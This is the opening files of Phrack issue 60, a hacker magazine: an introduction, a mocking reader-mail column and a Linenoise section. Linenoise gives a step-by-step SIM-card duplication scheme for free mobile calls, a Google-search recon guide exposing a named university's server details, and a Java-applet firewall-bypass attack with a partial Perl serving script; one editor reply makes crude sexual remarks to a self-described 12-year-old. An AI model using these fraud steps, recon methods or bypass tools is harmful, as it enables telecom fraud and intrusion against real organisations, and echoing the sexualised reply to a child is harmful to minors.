Phrack #60

ID: 94376
CVE: None
Download vulnerable application: None
Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x01 of 0x10


               _.                      _
              *  `.__________________.'_'._       ___ ___
           /|_____/`._____:    /_____     `._____/  //  /_______|\
          /      \  _`._  \   //   _ \____  `.     //  /  .*      \
         (        \ \  `. /  /_\  /__/   /  / /.__     \.'         )
          \  _____/  \___`.     )    \  :  /  \ `.  \   \_______  /
           \|    /___/ /___/.__/__/\__\___/\_____/_._\____\     |/
                           `-' pHRACK#6o          `-'


Jingle bells jingle bells jingle all the way...X-MAS TIME IS PHRACK-MAS TIME.

Wow, number #60 is out. Who ever thought that we will get that far :> Let's
take a look back in time who kept phrack going over all these years. Ladies
and gentlemen, we are proud to present the final, latest, incomplete and

DATE        NAME                                        PHRACKZ
2001-08-11                                              (p57..)
1997-09-01 route                                        (p51..p56)
1997-04-09 route, Datastream Cowboy                     (p50)
1996-11-08 route, Datastream Cowboy, Voyager            (p49)
1996-09-01 Voyager, ReDragon, route                     (p48)
1993-03-01 Erik Bloodaxe                                (p42..p47)
1991-09-15 Dispater                                     (p33..p41)
1990-05-28 Crimson Death                                (p31..p32)
1988-10-12 Taran King + Knight Lightning                (p20..p30)
1988-06-07 Crimson Death                                (p18..p19)
1988-04-07 Shooting Shark                               (p17)
1987-11-01 Elric of Imrryr                              (p16)
1985-11-17 Taran King + Knight Ligthning                (p01..p15)

..we came a long way...

What's new?

We revived Phrack Prophile to honor those who did some kewl stuff for
the scene.

This issue comes with a new section dedicated to tool annoucements
(Phrack armory). It showcases selected tools that have been released during
the last few month and that we consider cool enough to be mentioned here.

|=[ Table of Contents ]=-------------------------------------------------=|
| 0x01 Introduction                                 Phrack Staff 0x009 kb |
| 0x02 Loopback                                     Phrack Staff 0x00b kb |
| 0x03 Linenoise                                    Phrack Staff 0x01e kb |
| 0x04 Toolz Armory                                 Packet Storm 0x00b kb |
| 0x05 Phrack Prophile on horizon                   Phrack Staff 0x009 kb |
| 0x06 Smashing The Kernel Stack For Fun And Profit         noir 0x03e kb |
| 0x07 Burning the bridge: Cisco IOS exploits                 FX 0x028 kb |
| 0x08 Static Kernel Patching                             jbtzhm 0x072 kb |
| 0x09 Big Loop Integer Protection                 Oded Horovitz 0x067 kb |
| 0x0a Basic Integer Overflows                            blexim 0x01b kb |
| 0x0b SMB/CIFS By The Root                                ledin 0x07c kb |
| 0x0c Firewall Spotting with broken CRC                    Ed3f 0x026 kb |
| 0x0d Low Cost and Portable GPS Jammer                anonymous 0x021 kb |
| 0x0e Traffic Lights                                   plunkett 0x015 kb |
| 0x0f Phrack World News                            Phrack Staff 0x018 kb |
| 0x10 Phrack magazine extraction utility           Phrack Staff 0x015 kb |
|=------------------------------------------------------------=[ 0x282 kb |

  The latest, and all previous, phrack issues are available online at Readers without web access can subscribe to the
phrack-distrib mailinglist. Every new phrack is sent as email attachment
to this list. Every new phrack issue (without the attachment) is announced
on the announcement mailinglist.

To subscribe to the announcement mailinglist:
$ mail [email protected] < /dev/null

To subscribe to the distribution mailinglist:
$ mail [email protected] < /dev/null

To retrieve older issues (must subscribe first):
$ mail [email protected] < /dev/null
$ mail distrib-get.<n> < /dev/null
where n indicated the phrack issue [1..60].

Enjoy the magazine!

Phrack Magazine Vol 11 Number 60, Build 3, Dec 28, 2002. ISSN 1068-1035
Contents Copyright (c) 2002 Phrack Magazine.  All Rights Reserved.
Nothing may be reproduced in whole or in part without the prior written
permission from the editors. 
Phrack Magazine is made available to the public, as often as possible, free
of charge.

|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E ]=---------=|

Editors           : [email protected]
Submissions       : [email protected]
Commentary        : [email protected]
Phrack World News : [email protected]

  We have some agressive /dev/null-style mail filter running. We do reply
to every serious email. If you did not get a reply, then your mail was 
probably not worth an answer or was caught by our mailfilter. Make sure 
your mail has a non-implicit destination, one recipient, a non-empty 
subject field, and does not contain any html code and is 100% 7bit clean
pure ascii.


Submissions may be encrypted with the following PGP key:

Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see


phrack:~# head -22 /usr/include/std-disclaimer.h
 *  All information in Phrack Magazine is, to the best of the ability of
 *  the editors and contributors, truthful and accurate.  When possible,
 *  all facts are checked, all code is compiled.  However, we are not
 *  omniscient (hell, we don't even get paid).  It is entirely possible
 *  something contained within this publication is incorrect in some way.
 *  If this is the case, please drop us some email so that we can correct
 *  it in a future issue.
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for
 *  the entirely stupid (or illegal) things people may do with the
 *  information contained herein.  Phrack is a compendium of knowledge,
 *  wisdom, wit, and sass.  We neither advocate, condone nor participate
 *  in any sort of illicit behavior.  But we will sit back and watch.
 *  Lastly, it bears mentioning that the opinions that may be expressed in
 *  the articles of Phrack Magazine are intellectual property of their
 *  authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.

|=[ EOF ]=---------------------------------------------------------------=|

-------------------------------------------------------------------------------- cat /dev/random

                           ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x02 of 0x10

|=----------------------=[ L O O P B A C K ]=----------------------------=|
|=------------------------=[ phrackstaff ]=------------------------------=|

----| QUOTE of the month

    [ Once upon a time in #phrack ]

<OUAH:#phrack> *** PHRACK #60 SCHEDULED FOR 2002-12-27 ***
<chmod_:#phrack> i know
<chmod_:#phrack> its already 2 hours late
<phrack_webmaster_undercover:#phrack> is it already the 27th?
<chmod_:#phrack> yes
<chmod_:#phrack> in some parts of the world
<bajkero:#phrack> Fri Dec 27 02:01:13 CET 2002

    [ Meanwhile: phrack_webmaster_undercover doing the
      s/27th/28th/g thingie on index.php ]

<phrack_webmaster_undercover:#phrack> hmm. strange, it reads 28th here.
<chmod_:#phrack> they changed recently
<chmod_:#phrack> it was 27th just one hour ago
<phrack_webmaster_undercover:#phrack> mysterious...

----| Statistics of the month

[email protected]:/var/log > grep '\.mil' httpd_access.log | uniq | wc -l
[email protected]:/var/log > grep '\.gov' httpd_access.log | uniq | wc -l

|=[ 0x01 ]=--------------------------------------------------------------=|

Editor in Chief!!!!

[ Nope, sorry I'm just the phrackstaff's slave answering the emails. ]

I have been trying to get the phrack magazine but upto date I have not
succeeded.. I come from an African country called "kenya" and it seems they
dont bring them there!!!!!! Please send me the subscription and the
magazines if it posssible and bill me later,.....

[ Kenya, 1.00North, 38.00East, 582,650sq, higest point you can read
  phrack: Mount Kenya 5,199m, lowest point: Indian Ocen (0m hehe.).
  Potential number of phrack readers: 31,138,735. Hacker growth rate: 1.15%,
  hackers life expactancy at birth: 47.02 years, Literacy: age 15 and over
  can read phrack. 78.1% of the total population can read phrack.
  http://www.cia.giv/cia/publications/factbook/geos/ke.html ]
My address is [email protected]

Yours truly


[ Phrack is free. Nice to know that phrack read in all parts of the world,
  we definitely want to hear from you more often ]

|=[ 0x02 ]=--------------------------------------------------------------=|

From: Omar Tarabay <[email protected]>
Subject: a real newbie

Hey guys,

    [ Hello dude ]

I read your last edition and it was just great, i visited the site daily
to see if the new edition is down or not.

    [ oh, so that's you in the weblogs? Hi :> ]
I realy liked the files on your last edition (lockpicking was the greatest)
i won't ask questions that you expect me to ask like 'please tell me how to
hack into hotmail or the pentagon'.

    [ Oh man, you missed it, I had some 0day for you ]

put i read myself and learn things myself but as a newbie i don't find
most of your articles understandable,its only for experts and pros so
if you can write articles for newbies like me and many others who want to
learn please do, and about myself i amTURBOWEST(i am sure that u can know
my real name easily but please don't say it)

    [ Your real name is: TURBOEAST! ]

I am 12 y/o

   [ Nothing to be ashamed of. We will be at the same age in 13 years. ]

I program in python . I am trying to install linux on my PC but i face
some problems which i am trying to solve(i read a lot of books about

    [ You read these linux books? What did they teach you? How to format
      your harddrive, install a webcam and masturbate with 13 years old 
      girls on netmeetings? ]

finaly i would like to say thanks for all the phrack staff and ask them to
reply to me.


   [ Nothing. Hope you wont get any problems with the pedophile child
     molesters who get back to you now... ]

|=[ 0x03 ]=--------------------------------------------------------------=|

From: George escobar <[email protected]>
Subject: thanks

i found your site informative. thanks  

    [ at your service! We dont take money donation, however you can send
      female shaped human beings. ]

|=[ 0x04 ]=--------------------------------------------------------------=|

From: "Anthony Webb" <[email protected]>
Subject: OK..I'm stupid, but help me anyway

OK, I admit it...I love the website, but I can't find my way around in it.
Yeah, I know, I'm dumber than a bag of rusty hammers.  But I need help.

    [ It is a good start to admit it, let's look at your case ]

I am looking for a simple program to keep track of my companies phone calls
without the company knowing I'm doing it.

    [ Oh man ... that's not good at all ... ]

No, I am NOT paranoid, they ARE out to get me.

    [ Honestly, you are not! Be prepared for the worst! Watch Jackie Chan
      and Akira movies on a daily base to train your ninja-style to be
      prepared to whatever there might come. Huh? Did you hear that?

I don't have $1100 to $2500 to spend on Call Accounting Software and I
don't need all those bells and whistles anyway. I just need to keep track
of who the people are talking to, what time, what extension, whether its
outbound or inbound, etc. The company has an Avaya (Lucent) Merlin Magix
PBX system. By tracking who they call I can establish that they are indeed
guilty of harrassment against my paranoid little butt.

Got any ideas? gentle....but pissed at the organization.

    [ Are you sure that noone of your coworkers watched this email? ]

|=[ 0x05 ]=--------------------------------------------------------------=|

From: [email protected]

can I please get those zines in zip format, they are interesting, but I use
windows. If not, can you complete the articles? I was reading one, and it
was in txt and it said 9 of 10. there was no link to the 10th article. this
happened many times with different ones. Yeah anyways, I would be nice to
have those as zip files for those who don't have linux as would many others,
or at least fix the links. (not much of a problem just missing a page)
Great magazine, I just wish that I could complete it. thanx.

[ (man winzip) || (man google) || (man brain) || (man life) || (man gun) ]

|=[ 0x06 ]=--------------------------------------------------------------=|

From: "melissa royer" <[email protected]>


I am having some trouble compiling the code extracted from your site. I
have the code on linux RH 7.3 Is this the problem??

[[email protected] Loki]# make linux

make[1]: *** [surplus.o] Error 1
make[1]: Leaving directory `/loki/loki2/Loki'
make: *** [linux] Error 2

[ I swear this dood^H^H^H^H Melissa really tried to compile that 7 years old
  source from p49. Unless we turn into a red-hat-gcc-problems-support-center
  will we not give any hints. Rumours about any fusion on the latter topic
  can not be confirmed or denied at this point. ]

|=[ 0x07 ]=--------------------------------------------------------------=|

[ someone with a 'new' and 'unbreakable' crytpo idea of his own ]

[ blah blah ] ...didn't know Applied Cryptography, thanks for the link.
[ blah blah ] time pad are maybe not very usefull but they are for
hackers ...[ blah blah ]. When a friend of mine rooted NASA i used one-time
pads to tell my other friends [ blah blah blah ].

[ So what's your general recommendation then? That we should banish
  blowfish and use one-time-pad's because they are..err..better when
  we want to tell our...err..friends that we ..err..hacked NASA? hu? ]

|=[ 0x08 ]=--------------------------------------------------------------=|

From: "Bowman, Michael" <[email protected]>


    [ Dear Government Of Education, you failed to subscribe where your
      our schoolars already succeeded. Please ask your classmate if you
      have any further problems. We are awaiting your second trial until
      next monday or we are urget to inform the director about your lack
      of success. ]

|=[ 0x09 ]=--------------------------------------------------------------=|

[ from web comments to phrack 3-9, 2002-11-07
FromL [email protected]

I want to download some material from your website.

    [ Our links are protected by some kind of intelligent checker. You
      have to press ALT-Q while clicking on the link (quickly!). ]

|=[ 0x0a ]=--------------------------------------------------------------=|

From: "Dustin Smith" <[email protected]>
Subject: The unfortunate life...

Well you may know me as the "script kiddy" but lately i ma having 
illusions of Grandure and am aspiring to be...I dont dare say it
cuz I am stillso far off but yet so close.  So a subsription to your Holy 
grail will be just peaches...In all humbleness of the greatness
that is possed by few I bid you adue...

    [ THIS IS NOT MADE UP! We really get these kind of emails! ]

Broadband? Dial-up? Get reliable MSN Internet Access. 

    [ Get a brain first! ]

|=[ 0x0b ]=--------------------------------------------------------------=|

From: "Princess Of Darkness" <[email protected]>
Subject: symantec

uhh... hello.


My name's Rosie. hi.  I really actually know very little to nothing about 
hacking..  and it'd like to know more.  I know links, websites, etc. etc.  

    [ That's a beginning!
      Lesson2: "How do I read the website".
      Lesson3: "How do I understand the website"
      Lesson4: "How do I utilize the website"
      Lesson5: "How do I hire for a lawyer"
      Lesson6: "How do I escape the feds" ]

but when you can't even write html it makes things a little difficult.  God 
I feel so retarded. don't laugh. I'm a lam0r, i know.

    [ The real reason why phrack comes as .txt is because noone knows
      this < > -thingie either. ]

anyway, thanks a lot for like.. reading this...

    [ thanks a lot for like.. writing this... ]

and uh..  don't find out where i live..  cos that's.. scary..  O.o;;


|=[ 0x0c ]=--------------------------------------------------------------=|

From: anthony charles <[email protected]>

Dear editor,

i was directed by somebody i met online that i should
contact your mag about being a hacker.I'm resident in
Nigeria,West Africa. i would be very grateful if you
can assist me because it has been my dream to be a

The users in the hackers lounge in yahoo chat are too
fast for me. i need to learn the rudiments of becoming
a hacker.Every start's somewhere...this is where i
start if you would honor me by imparting knwledge to
an eager student.

Awaiting your reply.
yours sincerely
Anthony Charles

    [ no comment ]

|=[ EOF ]=---------------------------------------------------------------=|


                            ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x03 of 0x10

|=-----------------------=[ L I N E N O I S E ]=-------------------------=|
|=-------------------------=[ Phrack Staff ]=----------------------------=|

--[ Contents

  1 - The Dark Side of NTFS
  2 - Watching Big Brother
  3 - Free mobile calls
  4 - Lawfully Authorized Electronic Surveillance [LAES]
  5 - Java Tears down the Firewall

--[ 1 - The Dark Side of NTFS

Ok, this didnt fit anywhere else so we put it here:

--[ 2 - Watching Big Brother

        by da_knight <[email protected]>

    Have you ever wanted to be the one doing the watching? If you are a
system administrator of UNIX / Linux servers, then you may be aware of a
product called Big Brother, which can be downloaded from ''.
This article is by no means technical, simply because it doesn't need to
be. It is divided into two sections, so bear with me for the briefing on
Big Brother (BB).

    BB is a program that will monitor various computer equipment; things it
can monitor are connectivity, cpu utilization, disk usage, ftp status, http
status, pop3 status, etc. As you might imagine, this information is very
important to an organization. BB is your standard client / server setup.
The server software can run on various flavors of UNIX, Linux and NT. The
client software is available for UNIX, Linux, NT, Mac, Novell, AS/400, and
VAXEN; some client software is provided by 3rd-party vendors and not
supported by BB4 Technologies.

    The cool thing about this is all of this information is viewed on a web
page. So, if you have multiple servers that you have to maintain, with this
product you would be able to go to one web page and quickly get a status of
all of those servers - pretty handy. When everything is fine your status is
"green", major problems are indicated by "red".

    Example: The connectivity (conn) status is done by pinging the
equipment in question; if the ping fails then it would appear as a red zit
on the web page. When tests such as this fail, BB can be configured to
automatically page the administrator.

Here is a quick run down of the statuses, listed in order of severity:

red    - Trouble; you've got problems.
purple - No report; the client hasn't responded in the last 30 minutes.
yellow - Attention; a threshold has been crossed.
green  - OK; take the day off.
clear  - Unavailable; the test has been turned off.
blue   - Disabled; notification for this test has been turned off.

    The status is also reflected in the title of the web page, so it only
takes one red zit to cause the web page title to start with "red:Big
Brother"; we're going to get into this in a minute.

    A common thing for administrators to do is to monitor their most
important systems with this product, as well as the most important aspects
of each system. If you have a web server, you would want to monitor the
http and conn statuses just to make sure people are still able to connect
to the server. Other tests I have seen are to check Oracle, or to list all
connected users. Hell, they even have a way to add weather reports. The
point is, it's pretty limitless what can be monitored, it just depends on
what you deem important.

    Now that you have a little bit of an understanding what BB can do, I
want to quote two things from BB4 Technologies (BB4) FAQ - Section 5:
Security Considerations (
Everything in that section of the FAQ should be considered, but we'll focus
on these two.

    "BB does not need to run as root. We suggest creating a user 'bb' and
running bb as that user." "We recommend password-protecting the Big Brother
web pages"

    So, you ask yourself, why are these things important to me? Well, one,
you know that administrators who run this software probably have it setup
using the user 'bb', and that they may also be running it with root level
access. This gives you a valid user account on a system and this account
probably wouldn't be used by a human very often so the password could be
something simple. But that's not the point of this article. The second
thing is that BB4 realizes the information on these web pages is extremely
important and they recommend password-protecting them.

    Following this logic you then say these are web pages, so it's running
on a web server and if they're not password-protected and the server is
visible to the WWW, then...that's right search engines will find these
pages and serve them up when you know what to look for.

    What are you waiting for? Go to '' and search for
"green:Big Brother" (include the quotes; it makes it more refined). You
will get about 16,200 matches. Now that doesn't mean that those are all
unique because it will have numerous pages from the same site, but you get
the point. I would estimate that there are over 200 sites that can be
viewed this way. Remember to search for all the other statuses too, just
change the name of the color. One more thing, I chose Google for a reason.
Some of these sites no longer run the BB product, but Google has a nice
ability to view cached pages, so you can still glean information from them.

    After you scroll through the list of sites you will realize that the
majority of them are either small ISP's or colleges. I'm going to pick on a
college, an Ivy League one, no less. I can tell you from looking at this
particular BB site that the BB server is running on a computer called
'' and the IP address is ''. Also the
computer '' is having some serious issues. How did I
find the IP address? Simple; if you click on the "green" or whatever color
button under the "conn" column, you will see a web page that has
information similar to this:

--------------------------------------------------------- - conn

green Sun Jun 30 01:33:15 EDT 2002 Connection OK  PING
( from : 56(84) bytes of data. 64 bytes
from icmp_seq=0 ttl=255 time=379 usec

--- ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss round-trip
min/avg/max/mdev = 0.379/0.379/0.379/0.000 ms


    Right there you know that the ping command was trying to ping
'', in this case, '' and that it came
from '' or ''. Let's see what else we can
find out.

    I can see that almost all of their servers run Tripwire, so they are
UNIX systems, and you probably would have a hard time creating a backdoor
account on these systems. On another page, we get to see the users who are
currently logged in. Currently we have 33 users logged in, and seeing as
it's 1:33 AM, I think some people left their computers logged in.

    I want to get more information about Yale's servers, so let's go back
to Google and look for another page from Yale, but this time look for
''. Now we can get some good information. When this site
is displayed you will see quite a few servers, listed as well as several
departments. If you want to know what software '' is
using to run it's HTTP services just click on the 'green' button:

---------------------------------------------------- - http

green Sun Jun 30 01:45:21 EDT 2002 - Server OK
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: Date: Sun, 30
Jun 2002 05:45:21 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 12 Jan 1999 20:49:40 GMT ETag:
Content-Length: 2226

Seconds: 0.01 


    What the hell? They're actually running IIS 4.0? Don't they know how
insecure that is? But I digress. From that information you know that the
server is some version of Windows NT and it has IIS 4.0 running, that could
be handy.

    Zelda is also showing they monitor printers. Now that can be fun; what
if the message "I think therefore I hack!" is sent to the printer
''? And in case you're wondering, the
printer is an 'HP LaserJet 4050 Series'; I just had to click on the button
under the "printer" column to find that out.

    Elsewhere on this same site, I find that several servers are running
TELNET, POP3, Oracle, FTP, and IMAP. Most of these services will gladly
tell you what version of the software they are running. Oracle, for
instance, is even nice enough to show you all of the connected users. How
can you thank them enough for this valuable information?

    Also, it seems only the geologists at Yale feel they have data that is
of great importance. I wasn't able to view what they monitor because of
access permissions on their web site, but I do know that they are running
their web server on Apache version 1.3.26.

    As you can see, I would be able to gather an enormous amount of vital
infrastructure data in a few minutes. Plus, I didn't break any laws. These
web pages are posted in a manner that the entire world can view them. It
might take someone 10 minutes or more to find out a few facts about 1
particular system, but in that amount of time I found numerous facts about
over 40 systems at the same organization. Thanks Big Brother!

    I feel it should be mentioned that the information found on these web
pages is information that most organizations don't even let employees
outside of the IT department see. I guess I should feel special since Yale
must feel that I'm not a security risk, otherwise they would have made me
authenticate to their web sites.

    Imagine this; an ISP that lists all of their routers complete with IP's
and model information. If you had that, you could possibly rely on
vulnerabilities in SNMP discovered earlier this year, or better yet, rely
on the default accounts / passwords setup on these types of devices. I only
bring this up because I know I did come across an ISP that did list routers
and the majority of the sites returned by Google seemed to be smaller ISPs.

    Also, about searching on Google, I would recommend searching for
"red:Big Brother", because these pages will always give you more
information than when the system is running perfectly.

    Finally, I didn't write this article to condone breaking into systems
and providing a means to that end. I wrote this because security is
extremely important; with the information that is found because of this one
product your environment could be compromised. If you are a system
administrator for a site that shows up on Google you may want to secure
your BB web pages, because by the time you read this the world is going to
know your infrastructure.

--[ 3 - Free Mobile Calls

        by eurinomo

This bug can be utilized to make FREE CALS, FREE SMS, and even FREE 

    1st you have to see if you mobile network has the bug. Just call the
service free number (to don't waste money) and say to them that you card
is locked that you forgot your fone in your litle syster's room and your
mobile says "Sim Card is lock" or something, say that maybe yor sister have
wronged the puk because the phone was powered off and now it's on. Then the
guy must say that you have to go to one of theyr Mobile Shops and say the
problem and they will give you another card with the same number and money
as the old. Ask them how much it will cost and the guy must say it's for
free! :-)

Now the Matirial that youl need:
- A mobile phone not nokia (it's better to be yours and not unlocked)
- And a nokia(can be a unlocked 1 or steled or borrowed. Do as you wish!)

How to do it:

Mobile1 = Not nokia
Mobile2 = Nokia

Put the card in the mobile1 and enter your pin. When it booted up put this
code 3 times:
or try

    Check the manual and search for the code to change the puk if the above
examples dont work. Or give a email to motorola and say that you have a
motorola phone and that you want to change the puk and you know that is a
code to change (the code isn't ilegal and it's also specified in the 

    If the code isnt the one that i have telled is 1 nerby. If you have a 
motorola flare when you put **04* or **05* it'ill say "Enter the old Puk"
or something like that automatly and then ask the new puk code 2 times. But
the important is to lock your card, i think you can do it also if you wrong
the pin 3 times and then enter a wrong puk and vuala it's locked! But what i
was saing about the code it's was tested but you can try this last too, use
it in your on risk.

    Now goto the Mobile Shop and say what hapened (that your litle sister
or a doughter of an friend of your mother or something like that...) And
then they will dupicate the card and they will give you the new one and the
old one. At last they normaly give the 2.

    Now the easy part. Put the old card in the nokia and boot it up and you
see thats not locked!!! and if you put on anoher phone not nokia its says
that its locked, the Bug is a more nokia Bug that a network Bug. Now send a
SMS with the old card and see if disconted money. Then see if was disconted
from the new card if not than it's because the Network has the bug and you
can waste the money off the old card as you wish but you only have 2 weeks
or soo before they cut it out of the Network and it's completly lock, but
the new card stil have the same money and you can do it again and again
that i think they woldn't catch you.

This was tested in the Portugal Vodafone Mobile Phone Network.

--[ 4 - Introduction to Lawfully Authorized Electronic Surveillance (LAES)

           by Mystic <[email protected]>

In 1994 Congress adopted the Communications Assistance for Law Enforcement
Act (CALEA). It's intent was to preserve but not expand the wiretapping
capabilities of law enforcement agencies by requiring telecommunication
providers to utilize systems that would allow government agencies a basic
level of access for the purpose of surveillance. The act however does not
only preserve the already existing capabilities of law enforcement to tap
communications, it enhances them, allowing the government to collect
information about wireless callers, tap wireless content, text messing, and
packet communications. The standard that resulted from this legislation is
called Lawfully Authorized Electronic Surveillance or LAES.

A Telecommunications Service Provider (TSP) that is CALEA compliant
provides means to access the fallowing services and information to Law
Enforcement Agencies (LEAs):

1. Non-call associated: Information about the intercept subjects that is
   not necessarily related to a call.

2. Call associated: call-identifying information about calls involving the
   intercept subjects.

3. Call associated and Non-call associated signaling information: Signaling
   information initiated by the subject or the network

4. Content surveillance: the ability to monitor the subjects'

This process is called the intercept function. The intercept function is
made up of 5 separate functions: access, delivery, collection, service
provider administration, and law enforcement administration.    

----[ 4.1  The Access Function (AF)

    The AF consists of one or more Intercept Access Points (IAPs) that
isolate the subject's communications or call-identifying information
unobtrusively. There are several different IAPs that can be utilized in
the intercept function. I have separated them into Call Associated and
Non-call Associated information IAPs and Content Surveillance IAPs:

Call Associated and Non-call Associated information IAPs

- Serving System IAP (SSIAP): gives non-call associated information.

- Call-Identifying Information IAP (IDIAP): gives call associated
  information and in the form of the fallowing call events for basic
  circuit calls:

  Answer      - A party has answered a call attempt
  Change      - The identity or identities of a call has changed
  Origination - The system has routed a call dialed by the subject or the
                system has translated a number for the subject
  Redirection - A call has been redirected (e.g., forwarded,
                diverted, or deflected)
  Release     - The facilities for the entire call have
	        been released TerminationAttempt - A call attempt to an
	        intercept subject has been detected

- Intercept Subject Signaling IAP (ISSIAP): provides access to
  subject-initiated dialing and signaling information. This includes if the
  intercept subject uses call forwarding, call waiting, call hold, or
  three-way calling. It also gives the LEA the ability to receive the
  digits dialed by the subject.

- Network Signaling IAP (NSIAP): Allows the LEA to be informed about
  network messages that are sent to the intercept subject. These messages
  include busy, reorder, ringing, alerting, message waiting tone or visual
  indication, call waiting, calling or redirection name/number information,
  and displayed text.

Content Surveillance IAPs

   The fallowing are content surveillance IAPs that transmit content using
a CCC or CDC. An interesting note about content surveillance is that
TSPs are not responsible for decrypting information that is encrypted by
the intercept subject unless the data was encrypted by the TSP and the
TSP has the means to decrypt it. 

- Circuit IAP (CIAP): accesses call content of circuit-mode communications. 

- Conference Circuit IAP (CCIAP): Provides access to the content of
  subject-initiated Conference Call services such as three-way calling and
  multi-way calling.

- Packet Data IAP (PDIAP): Provides access to data packets sent or received
  by the intercept subject.
 These include the fallowing services:

 ISDN user-to-user signaling
 ISND D-channel X.25 packet services
 Short Message Services (SMS) for cellular and Personal Communication Services
 Wireless packet-mode data services (e.g., Cellular Digital Packet Data
        (CDPD), CDMA,  TDMA, PCS1900, or GSM-based packet-mode data  services)
 X.25 services
 TCP/IP services
 Paging (one-way or two-way)
 Packet-mode data services using traffic channels

----[ 4.2  The Delivery Function (DF)

   The DF is responsible for delivering intercepted communications to one
or more Collection Functions. This is done over two distinct types of
channels: Call Content Channels (CCCs) and Call Data Channels (CDCs).
The CCCs are generally used to transport call content such as voice or
data communications. CCCs are either "combined" meaning that they carry
transmit and receive paths on the same channel, or "separated" meaning
that transmit and receive paths are carried on separate channels. The
CDCs are generally used to transport messages which report
which is text based such as Short Message Service (SMS). Information
over CDCs is transmitted using a protocol called the Lawfully Authorized
Electronic Surveillance Protocol (LAESP).

----[ 4.3  The Collection Function (CF)

   The CF is responsible for collecting and analyzing intercepted
communications and call-identifying information and is the
responsibility of the LEA.

----[ 4.4  The Service Provider Administration Function (SPAF)

   The SPAF is responsible for controlling the TSP's Access and Delivery Functions.

----[ 4.5  The Law Enforcement Administration Function (LEAF)

   The LEAF is responsible for controlling the LEA's Collection Function
and is the responsibility of the LEA.

   Now that I've introduced you to LAES lets look at an implementation of
it that is on the market right now and is being used by some TSPs:

Overview of the CALEAserver:

   The CALEAserver is manufactured by SS8 Networks. It is a collection and
delivery system for call information and content. It allows existing
networks to become completely CALEA compliant. It allows for a LEA to
monitor wireless and wire line communications and gather information about
the calls remotely. The CALEAserver interfaces with the network through
Signaling System 7 (SS7) which is an extension of the Public Switched
Telephone Network (PSTN). The CALEAserver is composed of three major
layers: the Hardware Platform Layer, the Network Platform Layer and the
Application Software Layer.

    The Hardware Platform Layer consists of the Switching Matrix and the
Computing Platform. The Switching Matrix is an industry standard
programmable switch. It contains T1 cards for voice transmission and cross
connect between switches, DSP cards for the conference circuits required
for the intercept and DTMF reception/generation, and CPU cards for
management of the switch. The Computing Platform is a simplex, rack
mounted, UNIX based machine. It is used to run the CALEAserver application
software that provides Delivery Function capabilities and controls the
Switching Matrix.

   The Network Platform Layer provides SS7 capability, as well as, call
processing APIs for the Application Software Layer. It also controls the
Switching Matrix.

   The Application Software Layer is where the Delivery and Service Provider
Administration functions are carried out. It isolates the interfaces
towards the Access and Collection Functions from the main delivery
functionality allowing for multiple Access and Collection Functions through
the Interface Modules that can be added or modified without impacting the
existing functionality.

System Capacity:

Configurable for up to: 

1000 Collection functions 
128 Access Function Interfaces 
32 SS7 links 
512 simultaneous call content intercepts on a single call basis 
64 T1 voice facilities 

Operating Environment: 

NEBS compliant, -48 volt, 19" rack mounted equipment 
Next-generation UltraSPARC processor 
66-MHz PCIbus 
Solaris UNIX operating system 
9Gbyte, 40-MB/sec SCSI disks 
512 Mbytes RAM standard 
Ethernet/Fast Ethernet, 10-BaseT and 100-BaseT 
Two RS-232C/RS-423 serial ports 
Programmable, scalable switch with up to 4000 port time slot interchange


Built in test tools for remote testing 
Full SS7 management system 
Alarm reporting and Error logging 
Automatic software fault recovery 
Automatic or manual disk backup 
SNMP support 
Optional support for X.25 and other collection function interfaces 
ITU standard MML and Java based GUI support 
Support of both circuit-switched and packet-switched networks 
Optional support for other access function interfaces as required for
         CALEA compliance, including: 
 *HLR (Home Location Register) 
 *VMS (Voice Mail System) 
 *SMS (Short Message System) 
 *CDPD wireless data 
 *Authentication Center 
 *Remote access provisioning 

   This concludes the introduction to LAES. This being only an introduction,
I've left out allot of details like protocol information. However, if you
are interested it learning more about LAES I would suggest reading the TIA
standard J-STD-025A. I hope you learned a little bit more about the
surveillance capabilities of LEAs. If you have any questions feel free to
contact me. Email address: see above.

--[ 5 - Java tears down the Firewall

Recently there has been much hype about various
insecurities in firewalls which support tracking of FTP sessions.
They could be tricked into thinking someone was opening an
FTP session by using a second TCP stack for example. I would
point you to CERT-URL for complete discussion.
There have been other techniques discussed such as embedding
some evil tags in HTML files which makes the browser opening
connections a firewall could interpret as FTP session.

Consider the following net:

[ Company ] ---- [ firewall ] --- [ some router ] --- [ WEB ]

Someone from 'Company' is browsing the web and has to
pass his packets across some router that is not under control
by Company but by attacker. Very common scenario no?

A few tools have been compiled to circumvent such setup.
I would even say, as soon as you enable FTP tracking you are lost.
More than one way ends in Rome.

Let me explain the small tools in short.

html-redirect: Attacker installs this on some router and
sets up redirect rule to port 8888.

class-inject:  Attacker starts this with eftepe.class. html-redirect
will redirect the HTML requests to this mini-httpd. It forces
browser inside Company which is shielded by firewall to load
the Java applet. This applet simulates active FTP session to
some router and it is allowed so because security manager sees
some router as origin of eftepe.class. Firewall will then open
port 7350 inbound so you can connect from some router:20 to Company:7350.

ftpd: Attacker must run this on some router in order to simulate FTP

createclass: script to create the correct java code which is
using apropriate IP (of some router) and port (on Company) then

Attacker could also sit on WEB (i.e. :) and embed evil
java applets. So take care because X runs on port 6000. :-)

It is really that simple, and its not even worth an own article,
thats why you find it here as a add-on.

#!/usr/bin/perl -w

# Puts a classfile into remote browser

use IO::Socket;

sub usage
	print "Usage: $0 <class file>\n\n";

my $classfile = shift || usage();
my $class;
my $classlen = (stat($classfile))[7];
open I, "<$classfile" or die $!;
read I, $class, $classlen;
close I;

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 8080,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
	next unless $conn = $sock->accept();
	if (fork() > 0) {
	my $request = <$conn>;
	if ($request =~ /$classfile/) {
		my $classcontent = "HTTP/1.0 200 OK\r\n".
		 "Server: Apache/1.3.6 (Unix)\r\n".
		 "Content-Length: $classlen\r\n".
		 "Content-Type: application/octet-stream\r\n\r\n".$class;
